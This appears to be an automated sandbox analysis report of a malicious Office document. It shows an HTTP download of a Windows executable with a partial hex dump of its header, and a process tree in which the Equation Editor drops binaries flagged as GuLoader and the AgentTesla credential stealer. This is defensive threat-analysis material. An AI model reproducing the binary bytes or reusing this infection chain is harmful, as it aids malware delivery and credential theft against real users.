                                                    Dec 1, 2021 20:09:11.919054985 CET1INHTTP/1.1 200 OK
                                                    Date: Wed, 01 Dec 2021 19:09:11 GMT
                                                    Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
                                                    Last-Modified: Wed, 01 Dec 2021 09:20:35 GMT
                                                    ETag: "2020b-5d2122fb5045c"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 131595
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-msdownload
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 e0 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 11 00 00 00 c0 04 00 00 12 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PfPfPf*_9PfPgLPf*_;PfsVPf.V`PfRichPfPELZOaj-5@@.texthj `.rdatan@@.data@.ndata``.rsrc@@


                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:20:08:23
                                                    Start date:01/12/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                    Imagebase:0x13f800000
                                                    File size:1423704 bytes
                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:20:08:24
                                                    Start date:01/12/2021
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                    Imagebase:0x400000
                                                    File size:543304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:20:08:26
                                                    Start date:01/12/2021
                                                    Path:C:\Users\Public\vbc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\Public\vbc.exe"
                                                    Imagebase:0x400000
                                                    File size:131595 bytes
                                                    MD5 hash:99BDB5995C8DD619A3EC2B799D1CF868
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 20%, ReversingLabs
                                                    Reputation:low

                                                    General

                                                    Start time:20:08:29
                                                    Start date:01/12/2021
                                                    Path:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                    Imagebase:0x400000
                                                    File size:21304624 bytes
                                                    MD5 hash:E32061DA9B34B82E0AB5D0E53CAF5A09
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Visual Basic
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.680879474.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:20:09:29
                                                    Start date:01/12/2021
                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                    Imagebase:0xd30000
                                                    File size:107680 bytes
                                                    MD5 hash:10FE5178DFC39E15AFE7FED83C7A3B44
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.697985783.000000001E511000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.697985783.000000001E511000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.559197551.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    General

                                                    Start time:20:10:19
                                                    Start date:01/12/2021
                                                    Path:C:\Users\user\AppData\Roaming\misv.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Roaming\misv.exe"
                                                    Imagebase:0x400000
                                                    File size:135018 bytes
                                                    MD5 hash:1DA682EC8DCBC375B6E76660EF46D3FD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    Reputation:low

                                                    General

                                                    Start time:20:10:23
                                                    Start date:01/12/2021
                                                    Path:C:\Users\user\AppData\Local\Temp\misv.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Local\Temp\misv.exe
                                                    Imagebase:0x400000
                                                    File size:21214512 bytes
                                                    MD5 hash:267CE829152E1E6B2493EE80291C3E6D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:Visual Basic
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.692913146.0000000002FE0000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >